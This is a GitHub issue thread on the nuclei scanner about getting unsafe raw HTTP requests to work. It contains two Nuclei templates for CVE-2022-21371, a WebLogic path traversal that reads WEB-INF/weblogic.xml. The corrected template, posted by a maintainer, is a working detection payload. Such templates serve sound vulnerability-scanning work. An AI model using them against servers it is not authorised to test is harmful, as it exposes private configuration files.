### ISSUE TITLE
"--request-target" like support in unsafe http request

### ISSUE THREAD

**Issue by Y4er** [projectdiscovery/nuclei#1597]
### Nuclei version:
2.5.7

### Current Behavior:

When I was writing a poc for CVE-2022-21371, I found some nuclei issues.

This is my vulnerability verification in burpsuite.

![image](https://user-images.githubusercontent.com/40487319/153569734-10d6d1e5-b27b-423e-86fb-375802c33ea2.png)

this is my poc

```
id: CVE-2022-21371

info:
  name: WebLogic Server Directory Traversal
  author: public
  description: Oracle Fusion Middleware Directory Traversal
  severity: medium
  reference: https://packetstormsecurity.com/files/165736/Oracle-WebLogic-Server-14.1.1.0.0-Local-File-Inclusion.html
  tags: http,traversal,WebLogic,cve,CVE-2022-21371

requests:
  - raw:
      - |
        GET %2e//WEB-INF/1.txt HTTP/1.1
        Host: {{Hostname}}


    unsafe: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "hello"
        part: body

```

![image](https://user-images.githubusercontent.com/40487319/153571322-8a706805-baa9-4ed9-80cf-42318a62c134.png)

after send http request  return io timeout.

### Expected Behavior:

Vulnerability verification succeeded

**Comment by ehsandeep** [comment]
@Y4er any referecne to setup this CVE environment locally?

**Comment by Y4er** [comment]
i see there is pr in here: https://github.com/projectdiscovery/nuclei-templates/pull/3625

there is some reference

1. https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
2. https://github.com/projectdiscovery/nuclei-templates/pull/3625

**Comment by Y4er** [comment]
@JoshuaMart Yes, my problem is the same as you describe.

**Comment by Ice3man543** [comment]
@Y4er I tweaked the POC slightly, for unsafe request it is required to have a `+` sign after the raw request otherwise the newline get messed up leading to timeouts.  The below-shared template should work from the PR here https://github.com/projectdiscovery/nuclei-templates/pull/3625.

```yaml
id: CVE-2022-21371

info:
  name: Oracle WebLogic Server LFI
  author: paradessia,narluin
  severity: high
  description: Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion
  reference:
    - https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
    - https://nvd.nist.gov/vuln/detail/CVE-2022-21371
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21371
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.50
    cve-id: CVE-2022-21371
  tags: cve,cve2022,lfi,weblogic,oracle

requests:
  - method: GET
    raw: 
      - |+
        GET .//WEB-INF/weblogic.xml HTTP/1.1
        Host: {{Hostname}}
        User-Agent: curl/7.77.0
        Connection: close
        Accept: */*
        Accept-Encoding: gzip

    unsafe: true
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "weblogic-web-app"
          - "-descriptor>"
        condition: and

      - type: status
        status:
          - 200
  ```
